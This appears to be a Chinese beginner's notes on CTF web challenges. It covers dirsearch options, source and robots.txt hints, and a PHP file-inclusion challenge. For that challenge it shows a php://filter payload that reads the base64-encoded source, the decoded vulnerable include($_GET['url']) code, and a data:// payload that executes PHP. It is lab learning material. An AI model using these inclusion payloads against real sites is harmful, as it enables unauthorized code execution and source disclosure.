web菜狗初学笔记
Web签到
目录扫描工具-dirsearch
- 参数列表:
- -h, --help 查看帮助
- -u URL, --url=URL 设置url
- -L URLLIST, --url-list=URLLIST 设置url列表
- -e EXTENSIONS, --extensions=EXTENSIONS 网站脚本类型
- -w WORDLIST, --wordlist=WORDLIST 设置字典
- -l, --lowercase 小写
- -f, --force-extensions 强制扩展字典里的每个词条
- -s DELAY, --delay=DELAY 设置请求之间的延时
- -r, --recursive Bruteforce recursively 递归地扫描
- –scan-subdir=SCANSUBDIRS, --scan-subdirs=SCANSUBDIRS 扫描给定的url的子目录(用逗号隔开)
- –exclude-subdir=EXCLUDESUBDIRS, --exclude-subdirs=EXCLUDESUBDIRS 在递归过程中排除指定的子目录扫描(用逗号隔开)
- -t THREADSCOUNT, --threads=THREADSCOUNT 设置扫描线程
- -x EXCLUDESTATUSCODES, --exclude-status=EXCLUDESTATUSCODES 排除指定的网站状态码(用逗号隔开)
- -c COOKIE, --cookie=COOKIE 设置cookie
- –ua=USERAGENT, --user-agent=USERAGENT 设置用户代理
- -F, --follow-redirects 跟随地址重定向扫描
- -H HEADERS, --header=HEADERS 设置请求头
- –random-agents, --random-user-agents 设置随机代理
- –timeout=TIMEOUT 设置超时时间
- –ip=IP 设置代理IP地址
- –proxy=HTTPPROXY, --http-proxy=HTTPPROXY 设置http代理。例如127.0.0.1:8080
- –max-retries=MAXRETRIES 设置最大的重试次数
- -b, --request-by-hostname 通过主机名请求速度,默认通过IP
- –simple-report=SIMPLEOUTPUTFILE 保存结果,发现的路径
- –plain-text-report=PLAINTEXTOUTPUTFILE 保存结果,发现的路径和状态码
- –json-report=JSONOUTPUTFILE 以json格式保存结果
Flag在哪里?
view-source: 查看源码
Robots
robots.txt
POST&GET
get 、post 传参
qsnctf{e36e4d9c-8bc0-483e-8ce3-853d1f776355}
CheckMe01
CheckMe02
文件包含, php伪协议可以查看到index.php
的源码的base64:
?url=php://filter/read=convert.base64-encode/resource=index.php
PHRpdGxlPkNoZWNrTWUtMDI8L3RpdGxlPg0KPD9waHANCnByaW50KCI8aDE+5qyi6L+O5p2l5YiwQ2hlY2tNZS0wMu+8jOW/q+adpeWvu+aJvuS9oOeahEZsYWflubbmj5DkuqTlkKfjgII8L2gxPiIpOw0KPz4NCjw/cGhwDQplcnJvcl9yZXBvcnRpbmcoMCk7DQokdXJsPSRfR0VUWyd1cmwnXTsNCmlmKGlzc2V0KCR1cmwpKXsNCiAgICBpbmNsdWRlKCR1cmwpOw0KfQ0KICAgIA0KPz4NCjxodG1sIGxhbmc9InpoLUNOIj4NCjw/cGhwDQogICAgICAgICAgICANCiAgICAgICAgICAgICRjb2RlPSI8P3BocCBpbmNsdWRlKCQiLiJfR0VUWyd1cmwnXSk7Pz4iOw0KICAgICAgICAgICAgaGlnaGxpZ2h0X3N0cmluZygkY29kZSk7DQogICAgPz4NCg==
- <title>CheckMe-02</title>
- <?php
- print("<h1>欢迎来到CheckMe-02,快来寻找你的Flag并提交吧。</h1>");
- ?>
- <?php
- error_reporting(0);
- $url=$_GET['url'];
- if(isset($url)){
- include($url);
- }
-
- ?>
- <html lang="zh-CN">
- <?php
-
- $code="<?php include($"."_GET['url']);?>";
- highlight_string($code);
- ?>
- 读取phpinfo():
-
- ?url=data:text/plain,<?php phpinfo();?>
参考大佬博客
[青少年CTF]Web-CheckMe01-04 writeup by q1jun_q1jun的博客-CSDN博客
或者查看根目录下的flag
2个SQL
wp写的挺详细